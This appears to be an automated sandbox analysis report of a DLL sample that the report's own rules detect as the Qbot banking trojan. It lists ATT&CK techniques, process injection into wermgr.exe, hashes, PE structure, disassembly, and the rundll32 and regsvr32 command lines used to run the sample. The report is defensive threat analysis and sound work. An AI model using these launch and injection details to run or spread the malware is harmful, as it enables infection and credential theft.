          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Regsvr32          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rundll32          		Cached Domain Credentials15
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 715156 Sample: pebbles.dat.dll Startdate: 03/10/2022 Architecture: WINDOWS Score: 96 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected Qbot 2->37 39 3 other signatures 2->39 8 loaddll32.exe 1 2->8         started        process3 process4 10 regsvr32.exe 8->10         started        13 cmd.exe 1 8->13         started        15 rundll32.exe 8->15         started        17 3 other processes 8->17 signatures5 49 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->49 51 Writes to foreign memory regions 10->51 53 Allocates memory in foreign processes 10->53 19 wermgr.exe 10->19         started        21 audiodg.exe 10->21         started        23 rundll32.exe 13->23         started        55 Maps a DLL or memory area into another process 15->55 26 wermgr.exe 8 1 15->26         started        process6 file7 41 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 23->41 43 Writes to foreign memory regions 23->43 45 Allocates memory in foreign processes 23->45 47 Maps a DLL or memory area into another process 23->47 29 wermgr.exe 23->29         started        31 C:\Users\user\Desktop\pebbles.dat.dll, PE32 26->31 dropped signatures8 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pebbles.dat.dll17%ReversingLabs
          pebbles.dat.dll100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.wermgr.exe.970000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          8.0.wermgr.exe.12a0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          3.2.regsvr32.exe.990000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          4.2.rundll32.exe.4450000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          9.0.wermgr.exe.970000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          7.2.wermgr.exe.e40000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          5.2.rundll32.exe.2ee0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          7.0.wermgr.exe.e40000.0.unpack100%AviraHEUR/AGEN.1234562Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:715156
          Start date and time:2022-10-03 17:38:53 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 18s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:pebbles.dat.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:38
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal96.troj.evad.winDLL@21/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 25.3% (good quality ratio 24%)
          • Quality average: 77.1%
          • Quality standard deviation: 26.2%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 40
          • Number of non-executed functions: 43
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\Desktop\pebbles.dat.dll

          Download File
          Process:C:\Windows\SysWOW64\wermgr.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):4.667100449217363
          Encrypted:false
          SSDEEP:96:UORfeVXzt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:UORAjMkXIKPD
          MD5:21928784DA52AB71A60AF59EFA95CDAD
          SHA1:4FF8ECD9B0370614EA0C3D8583A51DF9D2481844
          SHA-256:285861283C9DC3F2D892B3CC186AD64CF17217D394B227A70B6C657C39D6568B
          SHA-512:CD79DFD111B8E1E8A3EB2F7E57DFB71D76AF677D6696564C15413391D7734F0C4A10D3987A3D4D9739C082C0710BC5B8566A4D4AB295EA501B5D909D0294C3F8
          Malicious:true
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[..[..~[...[..~[..|Z..~[Rich..~[........................PE..L.....:c...........!.........~..............0............................................@..........................p.......A..P................................6......p...........................0...@............@...............................data....a.......b.................. ....reloc6s.............f.............. ..`CODE.........0...........................idata..0....@......................@..@.hata....5...P...6..................@..@DATA....T............J..............@..@.rsrc................L..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................

          Static File Info

          General

          File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Entropy (8bit):6.9607693404023925
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:pebbles.dat.dll
          File size:493056
          MD5:d89521adaf6418e6ebe43b1a1a9d2af9
          SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
          SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
          SHA512:703db1e11372070dbbabc8a96c8600f079273e4dfad4e5437a5fd4b046187cf9f24b47ad68fadaf3bcf7fb1dcad8ecf98edd299281938eb144c4c6c29d68461f
          SSDEEP:12288:Y2X+B4HKFVxT5jXAcOf35HI9H5RGqdIhr54f:L5EVl5DC4HDbd
          TLSH:DBA48D0AB612C430D66910B12876BBE047ACBD325E751EDF73805F778A641F77A29F22
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[...[..~[...[..~[..|Z..~[Rich..~

          File Icon

          Icon Hash:74f0e4ecccdce0e4

          Static PE Info

          General

          Entrypoint:0x100382d9
          Entrypoint Section:.data
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x633AE6FF [Mon Oct 3 13:43:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:8877a7b766af3aace7fcad8462a174cc

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007FD97CC082C7h
          call 00007FD97CC087E4h
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007FD97CC08173h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          cmp ecx, dword ptr [10001D84h]
          jne 00007FD97CC082C3h
          ret
          jmp 00007FD97CC088CDh
          mov ecx, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], ecx
          pop ecx
          pop edi
          pop edi
          pop esi
          pop ebx
          mov esp, ebp
          pop ebp
          push ecx
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          mov dword ptr [ebp-10h], esp
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ecx
          lea ecx, dword ptr [esp+08h]
          sub ecx, eax
          and ecx, 0Fh
          add eax, ecx
          sbb ecx, ecx
          or eax, ecx

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x570100x10f.data
          IMAGE_DIRECTORY_ENTRY_IMPORT0x741880x50.idata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x36b4.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x311c00x70.data
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x312300x40.data
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x740000x184.idata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .data0x10000x5611f0x56200False0.6558956594702468data7.0153365923230595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .reloc6s0x580000x1a0f90x1a200False0.3239383971291866COM executable for DOS6.066972398111804IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          CODE0x730000x2000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .idata0x740000xa300xc00False0.404296875data4.897788340416598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .hata0x750000x35e70x3600False0.7127459490740741data5.561450278641814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          DATA0x790000x540x200False0.162109375data1.2433795844140498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x7a0000x1e00x200False0.53125data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x7b0000x36b40x3800False0.7310267857142857data6.633507194727193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_MANIFEST0x7a0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32.dllSleep, DebugBreak, GetCurrentProcess, lstrlenA, GetCurrentThreadId, lstrcmpA, VirtualAlloc, GetVersion, GetCommandLineA, GetFileAttributesA, GetCurrentThread, GetCurrentProcessId, GetModuleHandleW, lstrcmpiA, CreateFileW, CloseHandle, GetModuleHandleA, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, MoveFileExW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, WriteConsoleW
          ADVAPI32.dllCryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
          SHLWAPI.dllPathFindExtensionA, PathFindOnPathA, PathFileExistsA, PathFindSuffixArrayA, StrToIntA

          Exports

          NameOrdinalAddress
          DllRegisterServer10x1006eb00
          DllUnregisterServer20x1006f6f0
          bewailable30x10058e00
          courtlet40x10063590
          noncensored50x10067e60
          rhizocarpean60x100605f0
          stine70x10069040
          strigiles80x1005de90
          targetlike90x1006b820
          trimethoxy100x10061fd0

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          No network behavior found

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:17:39:50
          Start date:03/10/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Imagebase:0xb90000
          File size:116736 bytes
          MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          General

          Target ID:1
          Start time:17:39:50
          Start date:03/10/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff745070000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:2
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0xb0000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:3
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Imagebase:0xae0000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:4
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:5
          Start time:17:39:51
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          General

          Target ID:6
          Start time:17:39:54
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Target ID:7
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:8
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:9
          Start time:17:39:56
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x1340000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          General

          Target ID:10
          Start time:17:39:57
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Imagebase:0x170000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          General

          Target ID:33
          Start time:17:42:12
          Start date:03/10/2022
          Path:C:\Windows\System32\audiodg.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\AUDIODG.EXE 0x2ac
          Imagebase:0x7ff724e50000
          File size:594128 bytes
          MD5 hash:0B245353F92DF527AA7613BA2C0DA023
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:4.6%
            Total number of Nodes:2000
            Total number of Limit Nodes:58
            execution_graph 12964 991295 12965 99aab0 4 API calls 12964->12965 12966 9912ac 12965->12966 12967 9912d1 12966->12967 12968 9a36d5 2 API calls 12966->12968 13002 99117d 12967->13002 12968->12967 12971 99ab83 4 API calls 12972 991316 12971->12972 13001 9913d4 12972->13001 13009 997c67 12972->13009 12974 99b305 4 API calls 12976 9913eb 12974->12976 12977 99b3f2 5 API calls 12976->12977 12978 9913f7 12977->12978 13202 997aa7 12978->13202 12981 99ab83 4 API calls 12985 991368 12981->12985 12984 99133d 12986 998ddf 2 API calls 12984->12986 12994 991371 12985->12994 13024 996991 12985->13024 12991 991306 12986->12991 12987 99142c 13231 99110a 12987->13231 12988 99143e 12988->12984 12997 99110a 8 API calls 12988->12997 13175 99b305 12994->13175 12995 991438 13241 9910ba 12995->13241 12997->12995 13001->12974 13003 999f6b 2 API calls 13002->13003 13004 99118e 13003->13004 13005 999bfd 2 API calls 13004->13005 13006 9911aa 13005->13006 13007 998d87 2 API calls 13006->13007 13008 9911b7 13007->13008 13008->12971 13008->12991 13249 997eb5 13009->13249 13011 991334 13011->12981 13011->12984 13011->12994 13012 997c84 13012->13011 13260 9976f8 13012->13260 13014 997cae 13023 997cb5 13014->13023 13277 997692 13014->13277 13015 998ddf 2 API calls 13016 997cf0 13015->13016 13018 998ddf 2 API calls 13016->13018 13020 997cfb 13018->13020 13022 998ddf 2 API calls 13020->13022 13022->13011 13023->13015 13539 998dc9 RtlAllocateHeap 13024->13539 13026 9969a7 13027 99aaff 4 API calls 13026->13027 13127 996ea0 13026->13127 13028 9969bc 13027->13028 13540 99fd3d 13028->13540 13033 999ab3 RtlAllocateHeap 13034 9969e0 13033->13034 13035 999ab3 RtlAllocateHeap 13034->13035 13036 9969f4 13035->13036 13037 996a19 13036->13037 13038 999ab3 RtlAllocateHeap 13036->13038 13039 999ab3 RtlAllocateHeap 13037->13039 13038->13037 13040 996a3e 13039->13040 13566 99e849 13040->13566 13046 996aac 13047 996ab3 13046->13047 13613 998dc9 RtlAllocateHeap 13046->13613 13050 99109a 2 API calls 13047->13050 13049 996ac1 13049->13047 13614 99bb95 13049->13614 13051 996b02 13050->13051 13618 99b83a 13051->13618 13055 998d9a 2 API calls 13056 996b1c 13055->13056 13057 99109a 2 API calls 13056->13057 13058 996b28 13057->13058 13059 99b83a 5 API calls 13058->13059 13060 996b33 13059->13060 13061 998d9a 2 API calls 